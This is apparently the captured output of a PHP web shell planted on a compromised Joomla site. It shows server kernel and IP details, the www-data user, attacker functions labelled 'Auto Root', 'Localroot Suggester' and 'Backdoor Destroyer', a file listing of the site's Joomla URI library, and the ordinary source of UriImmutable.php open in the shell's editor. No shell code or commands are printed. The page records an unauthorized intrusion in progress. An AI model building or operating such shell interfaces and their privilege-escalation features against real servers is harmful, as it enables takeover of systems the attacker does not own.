Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.216.44
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
lusedi /
libraries /
vendor /
joomla /
uri /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
AbstractUri.php
8.15
KB
-rw-r--r--
2017-11-07 06:31
Uri.php
3.15
KB
-rw-r--r--
2017-11-07 06:31
UriHelper.php
1.47
KB
-rw-r--r--
2017-11-07 06:31
UriImmutable.php
1.36
KB
-rw-r--r--
2017-11-07 06:31
UriInterface.php
2.91
KB
-rw-r--r--
2017-11-07 06:31
Save
Rename
<?php /** * Part of the Joomla Framework Uri Package * * @copyright Copyright (C) 2005 - 2016 Open Source Matters. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE */ namespace Joomla\Uri; /** * Uri Class * * This is an immutable version of the uri class. * * @since 1.0 */ final class UriImmutable extends AbstractUri { /** * @var boolean Has this class been instantiated yet. * @since 1.0 */ private $constructed = false; /** * Prevent setting undeclared properties. * * @param string $name This is an immutable object, setting $name is not allowed. * @param mixed $value This is an immutable object, setting $value is not allowed. * * @return null This method always throws an exception. * * @since 1.0 * @throws \BadMethodCallException */ public function __set($name, $value) { throw new \BadMethodCallException('This is an immutable object'); } /** * This is a special constructor that prevents calling the __construct method again. * * @param string $uri The optional URI string * * @since 1.0 * @throws \BadMethodCallException */ public function __construct($uri = null) { if ($this->constructed === true) { throw new \BadMethodCallException('This is an immutable object'); } $this->constructed = true; parent::__construct($uri); } }